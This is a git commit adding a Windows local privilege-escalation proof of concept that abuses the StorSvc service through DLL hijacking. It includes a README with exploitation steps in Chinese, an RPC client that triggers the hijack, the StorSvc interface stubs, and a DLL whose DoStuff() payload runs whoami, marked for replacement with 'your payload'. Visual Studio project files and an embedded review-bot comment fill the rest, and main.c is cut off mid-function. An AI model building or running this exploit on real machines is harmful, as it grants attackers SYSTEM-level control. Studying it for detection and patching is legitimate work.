update windows All-Kill Way

This commit is contained in:
Ascotbe
2023-02-15 14:44:08 +08:00
parent 1d324e612d
commit e55eb366ba
15 changed files with 4309 additions and 0 deletions


@@ -0,0 +1,24 @@
## 概念验证
在这个 repo 中,我们提供了 2 个不同的源代码:
- RpcClient.exe触发 RPC 调用。
- SprintCSP.dll可以放置它来利用 DLL 劫持。此 PoC 运行`whoami`命令并将输出写入`C:\ProgramData\whoamiall.txt`. 如果您想扩展此 PoC 的功能,您可以`DoStuff()`在main.c中编辑函数。
**为了使其工作必须更改storsvc_c.c`#define`中的宏,以便利用程序适应目标机器的操作系统。**
## 步骤
1. 查找可写的 SYSTEM 路径`reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path`
2. 将SprintCSP.dll复制到可写路径。有些路径是不需要管理员权限的
3. 执行RpcClient.exe
4. 查看`C:\ProgramData\whoamiall.txt`
PS生成好的脚本是调用cmd弹窗
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/LPE_via_StorSvc.gif)
## 代码来源
- [blackarrowsec](https://github.com/blackarrowsec/redteam-research)
- [OWwWO](https://github.com/OWwWO)


@@ -0,0 +1,31 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.32413.511
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcClient", "RpcClient\RpcClient.vcxproj", "{7087F80C-0E20-4E81-909B-17FA23AF618D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x64.ActiveCfg = Debug|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x64.Build.0 = Debug|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x86.ActiveCfg = Debug|Win32
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x86.Build.0 = Debug|Win32
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x64.ActiveCfg = Release|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x64.Build.0 = Release|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x86.ActiveCfg = Release|Win32
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {9C8B97E6-8876-43C8-B59D-50D011AE98C5}
EndGlobalSection
EndGlobal


@@ -0,0 +1,56 @@
#include "storsvc_h.h"
#include <iostream>
#include <windows.h>
#pragma comment(lib, "RpcRT4.lib")
int wmain(int argc, wchar_t* argv[])
{
RPC_STATUS status;
RPC_WSTR StringBinding;
RPC_BINDING_HANDLE Binding;
status = RpcStringBindingCompose(
NULL,
(RPC_WSTR)L"ncalrpc",
(RPC_WSTR)L"",
(RPC_WSTR)L"",
NULL,
&StringBinding
);
status = RpcBindingFromStringBinding(
StringBinding,
&Binding
);
status = RpcStringFree(
&StringBinding
);
RpcTryExcept
{
long result = Proc6_SvcRebootToFlashingMode(Binding, 0, 0);
if (result == 0)
wprintf(L"[+] Dll hijack triggered!");
else
wprintf(L"[!] Manual reboot of StorSvc service is required.");
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
}
RpcEndExcept
status = RpcBindingFree(&Binding);
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
return((void __RPC_FAR*) malloc(cBytes));
}
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
free(p);
}


@@ -0,0 +1,153 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{7087f80c-0e20-4e81-909b-17fa23af618d}</ProjectGuid>
<RootNamespace>RpcClient</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="RpcClient.cpp" />
<ClCompile Include="storsvc_c.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="storsvc_h.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@@ -0,0 +1,30 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="RpcClient.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="storsvc_c.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="storsvc_h.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>


@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@@ -0,0 +1,153 @@
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif
#ifndef __storsvc_h_h__
#define __storsvc_h_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__
typedef struct Struct_22_t
{
long StructMember0;
short StructMember1;
short StructMember2;
byte StructMember3[ 8 ];
} Struct_22_t;
typedef struct Struct_34_t
{
long StructMember0;
wchar_t StructMember1[ 260 ];
long StructMember2;
short StructMember3;
short StructMember4;
long StructMember5;
short StructMember6;
short StructMember7;
struct Struct_22_t StructMember8;
long StructMember9;
hyper StructMember10;
wchar_t StructMember11[ 260 ];
long StructMember12;
long StructMember13;
} Struct_34_t;
typedef struct Struct_76_t
{
long StructMember0[ 2 ];
} Struct_76_t;
typedef struct Struct_90_t
{
long StructMember0;
short StructMember1;
long StructMember2;
short StructMember3;
short StructMember4;
} Struct_90_t;
typedef struct Struct_112_t
{
long StructMember0;
long StructMember1;
long StructMember2;
short StructMember3;
} Struct_112_t;
typedef struct Struct_134_t
{
long StructMember0;
short StructMember1;
long StructMember2;
long StructMember3;
long StructMember4;
long StructMember5;
} Struct_134_t;
typedef struct Struct_164_t
{
double StructMember0;
wchar_t StructMember1[ 39 ];
} Struct_164_t;
long Proc0_SvcMountVolume( handle_t IDL_handle, short arg_1, long arg_2, long arg_3);
long Proc1_SvcDismountVolume( handle_t IDL_handle, short arg_1, long arg_2, long arg_3);
long Proc2_SvcFormatVolume( handle_t IDL_handle, short arg_1, long arg_2, long arg_3);
long Proc3_SvcGetStorageInstanceCount( handle_t IDL_handle, short arg_1, long *arg_2);
long Proc4_SvcGetStorageDeviceInfo( handle_t IDL_handle, short arg_1, long arg_2, struct Struct_34_t *arg_3);
long Proc5_CCleanupPolicy__CleanupItem( handle_t IDL_handle, short arg_1, short arg_2, long arg_3, struct Struct_76_t *arg_4);
long Proc6_SvcRebootToFlashingMode( handle_t IDL_handle, long arg_1, long arg_2);
long Proc7_SvcRebootToUosFlashing( handle_t IDL_handle, long arg_1, long arg_2);
long Proc8_SvcFinalizeVolume( handle_t IDL_handle, short arg_1, long arg_2);
long Proc9_SvcGetStorageSettings( handle_t IDL_handle, short arg_1, long arg_2, short arg_3, long *arg_4);
long Proc10_SvcResetStoragePolicySettings( handle_t IDL_handle);
long Proc11_SvcSetStorageSettings( handle_t IDL_handle, short arg_1, long arg_2, short arg_3, long arg_4);
long Proc12_SvcTriggerStorageCleanup( handle_t IDL_handle, struct Struct_90_t *arg_1);
long Proc13_SvcTriggerLowStorageNotification( handle_t IDL_handle, short arg_1, long arg_2);
__int3264 Proc14_SvcMoveFileInheritSecurity( handle_t IDL_handle, wchar_t *arg_1, wchar_t *arg_2, long arg_3);
long Proc15_SvcScanVolume( handle_t IDL_handle, short arg_1, long arg_2, struct Struct_112_t *arg_3);
long Proc16_SvcProcessStorageCardChange( handle_t IDL_handle);
long Proc17_SvcProvisionForAppInstall( handle_t IDL_handle, short arg_1, long arg_2);
long Proc18_SvcGetStorageInstanceCountForMaps( handle_t IDL_handle, short arg_1, long *arg_2);
long Proc19_SvcGetStoragePolicySettings( handle_t IDL_handle, short arg_1, wchar_t *arg_2, long *arg_3);
long Proc20_SvcSetStoragePolicySettings( handle_t IDL_handle, short arg_1, wchar_t *arg_2, long arg_3);
long Proc21_SvcTriggerStoragePolicies( handle_t IDL_handle, struct Struct_134_t *arg_1);
long Proc22_SvcPredictStorageHealth( handle_t IDL_handle, struct Struct_164_t **arg_1, long *arg_2);
long Proc23_SvcGetLastFailedSaveLocationPath( handle_t IDL_handle, wchar_t **arg_1);
extern RPC_IF_HANDLE DefaultIfName_v0_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v0_0_s_ifspec;
#endif
#ifdef __cplusplus
}
#endif
#endif


@@ -0,0 +1,31 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.1.32421.90
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SprintCSP", "SprintCSP\SprintCSP.vcxproj", "{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x64.ActiveCfg = Debug|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x64.Build.0 = Debug|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x86.ActiveCfg = Debug|Win32
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x86.Build.0 = Debug|Win32
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x64.ActiveCfg = Release|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x64.Build.0 = Release|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x86.ActiveCfg = Release|Win32
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {97DA3635-DE9B-4111-B258-F7A021B25B22}
EndGlobalSection
EndGlobal


@@ -0,0 +1,151 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{239f08c0-2a3d-44a1-a53e-1ff6a2acb398}</ProjectGuid>
<RootNamespace>whoami</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>SprintCSP</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>
</EntryPointSymbol>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
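Review bot: The Debug|Win32 configuration sets `<ConfigurationType>Application</ConfigurationType>` while the other three configurations build a DynamicLibrary and the README describes the artifact as SprintCSP.dll, so that configuration links main.c (whose entry point is DllMain) as an executable; it should read `<ConfigurationType>DynamicLibrary</ConfigurationType>` like the others. The `<EntryPointSymbol>` element in the Release|x64 link settings is empty and appears to be an editing leftover; it is presumably harmless but could be dropped. `<RootNamespace>whoami</RootNamespace>` also disagrees with `<ProjectName>SprintCSP</ProjectName>`, which is cosmetic but worth aligning.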


@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Archivos de origen">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Archivos de encabezado">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Archivos de recursos">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Archivos de origen</Filter>
</ClCompile>
</ItemGroup>
</Project>


@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@@ -0,0 +1,291 @@
#include <windows.h>
#pragma warning(disable:4996)
#define DllExport __declspec( dllexport )
#define UNLEN 256
void DoStuff() {
// Replace all this code by your payload
STARTUPINFO si = { sizeof(STARTUPINFO) };
PROCESS_INFORMATION pi;
CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C whoami /all > C:\\ProgramData\\whoamiall.txt",
NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return;
}
// https://learn.microsoft.com/en-us/windows/win32/services/starting-a-service
VOID __stdcall DoStopSvc()
{
SERVICE_STATUS_PROCESS ssp;
DWORD dwStartTime = GetTickCount64();
DWORD dwBytesNeeded;
DWORD dwTimeout = 30000; // 30-second time-out
DWORD dwWaitTime;
SC_HANDLE schSCManager, schService;
LPCTSTR szSvcName = L"StorSvc";
// Get a handle to the SCM database.
schSCManager = OpenSCManager(
NULL, // local computer
NULL, // ServicesActive database
SC_MANAGER_ALL_ACCESS); // full access rights
if (NULL == schSCManager)
{
return;
}
// Get a handle to the service.
schService = OpenService(
schSCManager, // SCM database
szSvcName, // name of service
SERVICE_STOP |
SERVICE_QUERY_STATUS |
SERVICE_ENUMERATE_DEPENDENTS);
if (schService == NULL)
{
CloseServiceHandle(schSCManager);
return;
}
// Make sure the service is not already stopped.
if (!QueryServiceStatusEx(
schService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
{
goto stop_cleanup;
}
if (ssp.dwCurrentState == SERVICE_STOPPED)
{
goto stop_cleanup;
}
// If a stop is pending, wait for it.
while (ssp.dwCurrentState == SERVICE_STOP_PENDING)
{
// Do not wait longer than the wait hint. A good interval is
// one-tenth of the wait hint but not less than 1 second
// and not more than 10 seconds.
dwWaitTime = ssp.dwWaitHint / 10;
if (dwWaitTime < 1000)
dwWaitTime = 1000;
else if (dwWaitTime > 10000)
dwWaitTime = 10000;
Sleep(dwWaitTime);
if (!QueryServiceStatusEx(
schService,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&ssp,
sizeof(SERVICE_STATUS_PROCESS),
&dwBytesNeeded))
{
goto stop_cleanup;
}
if (ssp.dwCurrentState == SERVICE_STOPPED)
{
goto stop_cleanup;
}
if (GetTickCount() - dwStartTime > dwTimeout)
{
